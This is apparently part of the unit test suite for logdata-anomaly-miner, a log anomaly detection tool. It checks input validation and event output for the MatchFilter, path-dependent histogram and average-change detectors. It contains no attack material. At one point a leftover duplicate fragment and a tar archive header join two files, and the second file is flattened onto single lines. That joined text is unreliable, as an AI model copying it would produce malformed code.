        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", None, ["default"], [self.stream_printer_event_handler])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, ["default"], [self.stream_printer_event_handler])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, None, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, "", [self.stream_printer_event_handler])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, b"Default", [self.stream_printer_event_handler])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, True, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100.1, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, {"id": "Default"}, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, (), [self.stream_printer_event_handler])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, set(), [self.stream_printer_event_handler])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, ["default"])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, None)
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, "")
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, b"Default")
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, True)
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, 123)
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, 123.3)
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, {"id": "Default"})
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, ())
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, set())
        # reset_after_report_flag and output_logline must be bool (None is rejected too).
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], reset_after_report_flag=["default"])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], reset_after_report_flag=None)
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], reset_after_report_flag="")
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], reset_after_report_flag=b"Default")
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], reset_after_report_flag=123)
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], reset_after_report_flag=123.3)
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], reset_after_report_flag={"id": "Default"})
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], reset_after_report_flag=())
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], reset_after_report_flag=set())
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], output_logline=["default"])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], output_logline=None)
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], output_logline="")
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], output_logline=b"Default")
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], output_logline=123)
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], output_logline=123.3)
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], output_logline={"id": "Default"})
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], output_logline=())
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], output_logline=set())
        # log_resource_ignore_list: same contract as for HistogramAnalysis -- a bare path
        # is a ValueError, non-list values are a TypeError, a file:// URL is accepted.
        self.assertRaises(ValueError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], log_resource_ignore_list=["/tmp/syslog"])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], log_resource_ignore_list="")
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], log_resource_ignore_list=b"Default")
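class MatchFilterTest(TestBase):
    """Unittests for the MatchFilter."""

    def test1receive_atom(self):
        """Test if log atoms are processed correctly.

        Four scenarios are exercised in sequence on one filter instance: the matched path is in
        target_path_list (event expected), it is not (no event), path and value are both listed
        (event expected), and the path is listed but only some values are (event only for those).
        """
        fmme = DummyFirstMatchModelElement("first", [DummyFixedDataModelElement(f"s{i}", f"val{i}".encode()) for i in range(10)])
        match_filter = MatchFilter(self.aminer_config, [f"/first/s{i}" for i in range(10)], [self.stream_printer_event_handler])
        t = time.time()
        # The timestamp is the same for every atom, so its rendering is computed once.
        timestamp = datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S")
        expected_string = '%s Log Atom Filtered\nMatchFilter: "None" (1 lines)\n val%d\n\n'

        def feed(val):
            """Build the atom for val{val}, deliver it to the filter and return (then clear) the captured output."""
            val_str = f"val{val}".encode()
            log_atom = LogAtom(val_str, ParserMatch(fmme.get_match_element("", DummyMatchContext(val_str))), t, match_filter)
            match_filter.receive_atom(log_atom)
            output = self.output_stream.getvalue()
            self.reset_output_stream()
            return output

        # An event is triggered when the matched path is in target_path_list.
        for val in range(10):
            self.assertEqual(expected_string % (timestamp, val), feed(val))

        # No event is triggered when the matched path is not in target_path_list.
        match_filter.target_path_list = ["/strings"]
        for val in range(10):
            self.assertEqual("", feed(val))

        # An event is triggered when the path is listed and the value is in target_value_list.
        match_filter.target_path_list = [f"/first/s{i}" for i in range(10)]
        match_filter.target_value_list = [f"val{i}" for i in range(10)]
        for val in range(10):
            self.assertEqual(expected_string % (timestamp, val), feed(val))

        # With the path listed but only val0..val5 in target_value_list, only those values trigger an event.
        match_filter.target_value_list = [f"val{i}" for i in range(6)]
        for val in range(10):
            expected = expected_string % (timestamp, val) if val <= 5 else ""
            self.assertEqual(expected, feed(val))

    def test2validate_parameters(self):
        """Test all initialization parameters for the detector. Input parameters must be validated in the class.

        Each parameter is driven through a table of wrong-typed values inside subTest, so a validation gap is
        reported with the offending parameter and value rather than as an anonymous assertRaises failure.
        These negative cases guard the configuration boundary: a malformed value must fail at construction
        instead of yielding a filter that silently never fires.
        """
        cfg = self.aminer_config
        handlers = [self.stream_printer_event_handler]

        # target_path_list: must be a non-empty list.
        self.assertRaises(ValueError, MatchFilter, cfg, [], handlers)
        for value in (None, "", b"Default", True, 123, 123.3, {"id": "Default"}, (), set()):
            with self.subTest(target_path_list=value):
                self.assertRaises(TypeError, MatchFilter, cfg, value, handlers)

        # anomaly_event_handlers: must be a list of handler objects, not a list of strings or another container.
        for value in (["default"], None, "", b"Default", True, 123, 123.3, {"id": "Default"}, (), set()):
            with self.subTest(anomaly_event_handlers=value):
                self.assertRaises(TypeError, MatchFilter, cfg, ["Default"], value)

        # target_value_list can actually be empty with [] or None, but scalars and other containers are rejected.
        for value in (True, 123, 123.3, {"id": "Default"}, (), set()):
            with self.subTest(target_value_list=value):
                self.assertRaises(TypeError, MatchFilter, cfg, ["Default"], handlers, value)

        # output_logline: must be a bool.
        for value in ("", None, b"Default", ["default"], 123, 123.3, {"id": "Default"}, (), set()):
            with self.subTest(output_logline=value):
                self.assertRaises(TypeError, MatchFilter, cfg, ["Default"], handlers, output_logline=value)

        # Valid configurations must construct; the value list may hold strings or numbers.
        MatchFilter(cfg, ["Default"], handlers, ["val"], True)
        MatchFilter(cfg, ["Default"], handlers, [123, 123.2], True)

        # log_resource_ignore_list: a list of resource URIs. A bare filesystem path is rejected with ValueError,
        # so only the URI form (file:///...) is accepted.
        self.assertRaises(ValueError, MatchFilter, cfg, ["Default"], handlers, log_resource_ignore_list=["/tmp/syslog"])
        for value in ("", b"Default", True, 123, 123.22, {"id": "Default"}, (), set()):
            with self.subTest(log_resource_ignore_list=value):
                self.assertRaises(TypeError, MatchFilter, cfg, ["Default"], handlers, log_resource_ignore_list=value)
        MatchFilter(cfg, ["Default"], handlers, log_resource_ignore_list=["file:///tmp/syslog"])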
[self.stream_printer_event_handler], log_resource_ignore_list=set()) MatchFilter(self.aminer_config, ["Default"], [self.stream_printer_event_handler], log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/MatchValueAverageChangeDetectorTest.py000066400000000000000000000617151500476301700331530ustar00rootroot00000000000000import unittest from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase, DummySequenceModelElement, DummyNumberModelElement, DummyFixedDataModelElement, DummyMatchContext import time import math from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD class MatchValueAverageChangeDetectorTest(TestBase): """Unittests for the MatchValueAverageChangeDetector.""" def test1receive_atom(self): """Test if log atoms are processed correctly.""" start_time = 30 cron_job1 = "match/cron/job1" cron_job2 = "match/cron/job2" parsing_model = DummySequenceModelElement("cron", [DummyNumberModelElement("job1"), DummyFixedDataModelElement("sp", b" "), DummyNumberModelElement("job2")]) # verify that no statistic evaluation is performed, until the minimal amount of bin elements is reached. # first is initial generation of the bins. 
mvacd = MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, [cron_job1], 10, start_time, False, "Default") for i in range(1, 41): t = start_time + math.pow(i, 7) match_context = DummyMatchContext(b"%d %d" % (t, start_time + i)) match_element = parsing_model.get_match_element("match", match_context) log_atom = LogAtom(match_element.get_match_object(), ParserMatch(match_element), start_time + i, mvacd) mvacd.receive_atom(log_atom) if i < mvacd.min_bin_elements * 2 or i % mvacd.min_bin_elements != 0: self.assertEqual(self.output_stream.getvalue(), "") else: self.assertNotEqual(self.output_stream.getvalue(), "") self.reset_output_stream() # verify that no statistic evaluation is performed, until the start time is reached. mvacd = MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], cron_job2, [cron_job1], 10, start_time, False, "Default") for i in range(41): t = start_time + math.pow(i, 7) match_context = DummyMatchContext(b"%d %d" % (t, i)) match_element = parsing_model.get_match_element("match", match_context) log_atom = LogAtom(match_element.get_match_object(), ParserMatch(match_element), i, mvacd) mvacd.receive_atom(log_atom) if i <= 30 or i < mvacd.min_bin_elements * 2 or i % mvacd.min_bin_elements != 0: self.assertEqual(self.output_stream.getvalue(), "") else: self.assertNotEqual(self.output_stream.getvalue(), "") self.reset_output_stream() mvacd = MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, [cron_job1, cron_job2], 10, start_time, False, "Default") for i in range(1, 41): t = start_time + math.pow(i, 7) t1 = start_time + math.pow(i, 4) match_context = DummyMatchContext(b"%d %d" % (t, t1)) match_element = parsing_model.get_match_element("match", match_context) log_atom = LogAtom(match_element.get_match_object(), ParserMatch(match_element), t1, mvacd) mvacd.receive_atom(log_atom) if i < mvacd.min_bin_elements * 2 or i % 
mvacd.min_bin_elements != 0: self.assertEqual(self.output_stream.getvalue(), "") else: self.assertNotEqual(self.output_stream.getvalue(), "") self.reset_output_stream() def test2do_timer(self): """Test if the do_timer method is implemented properly.""" mvacd = MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, ["cron/job1"], 3, 57600, False, "Default") t = time.time() mvacd.next_persist_time = t + 400 self.assertEqual(mvacd.do_timer(t + 200), 200) self.assertEqual(mvacd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(mvacd.do_timer(t + 999), 1) self.assertEqual(mvacd.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) def test3persistence(self): """Test the do_persist and load_persistence_data methods.""" mvacd = MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, ["cron/job1"], 3, 57600, False, "Default") mvacd.stat_data = [("cron/job1", [57600, 57600, (3, 3000.0, 5000000.0, 1000.0, 1000000.0), (2, 30000.0, 500000000.0)])] mvacd.do_persist() with open(mvacd.persistence_file_name, "r") as f: self.assertEqual(f.read(), '[["string:cron/job1", [57600, 57600, [3, 3000.0, 5000000.0, 1000.0, 1000000.0], [2, 30000.0, 500000000.0]]]]') mvacd.stat_data = [] mvacd.load_persistence_data() self.assertEqual(mvacd.stat_data, [("cron/job1", [57600, 57600, (3, 3000.0, 5000000.0, 1000.0, 1000000.0), (2, 30000.0, 500000000.0)])]) other = MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, ["cron/job1"], 3, 57600, False, "Default") self.assertEqual(mvacd.stat_data, other.stat_data) def test4validate_parameters(self): """Test all initialization parameters for the detector. 
Input parameters must be validated in the class.""" self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, ["default"], None, ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, None, None, ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, "", None, ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, b"Default", None, ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, True, None, ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, 123, None, ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, 123.3, None, ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, {"id": "Default"}, None, ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, (), None, ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, set(), None, ["/path"], 3, 1) self.assertRaises(ValueError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], "", ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], 123, ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], 123.2, ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], b"", ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], b"default", ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, 
[self.stream_printer_event_handler], {"id": "Default"}, ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], [], ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], (), ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], set(), ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], True, ["/path"], 3, 1) self.assertRaises(ValueError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, [], 3, 1) self.assertRaises(ValueError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, [""], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, "", 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, 123, 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, 123.2, 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, b"default", 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, {"id": "Default"}, 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, (), 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, 
[self.stream_printer_event_handler], None, set(), 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, True, 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], None, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], "3", 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], b"3", 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], {"id": 3}, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], [3], 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], [], 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], (), 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], set(), 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], True, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 123.3, 1) self.assertRaises(ValueError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], -1, 1) self.assertRaises(ValueError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 0, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, 
self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, None) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, "1") self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, b"1") self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, {"id": 1}) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, [1]) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, ()) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, set()) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, True) self.assertRaises(ValueError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, -1) self.assertRaises(ValueError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 0) MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1) MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1.2) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, debug_mode=None) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, debug_mode=b"True") self.assertRaises(TypeError, MatchValueAverageChangeDetector, 
self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, debug_mode="True") self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, debug_mode=123) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, debug_mode=123.22) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, debug_mode={"id": "Default"}) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, debug_mode=["Default"]) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, debug_mode=[]) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, debug_mode=()) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, debug_mode=set()) MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, debug_mode=True) self.assertRaises(ValueError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, persistence_id="") self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, persistence_id=None) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, persistence_id=b"Default") self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, 
persistence_id=True) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, persistence_id=123) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, persistence_id=123.22) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, persistence_id={"id": "Default"}) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, persistence_id=["Default"]) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, persistence_id=[]) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, persistence_id=()) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, persistence_id=set()) MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, persistence_id="Default") self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, output_logline=None) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, output_logline=b"True") self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, output_logline="True") self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, output_logline=123) 
self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, output_logline=123.22) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, output_logline={"id": "Default"}) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, output_logline=["Default"]) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, output_logline=[]) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, output_logline=()) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, output_logline=set()) MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, output_logline=True) self.assertRaises(ValueError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, 
["/path"], 3, 1, learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_time=set()) MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_time=100) MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, 
[self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_no_anomaly_time=set()) MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_no_anomaly_time=100) MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, MatchValueAverageChangeDetector, self.aminer_config, 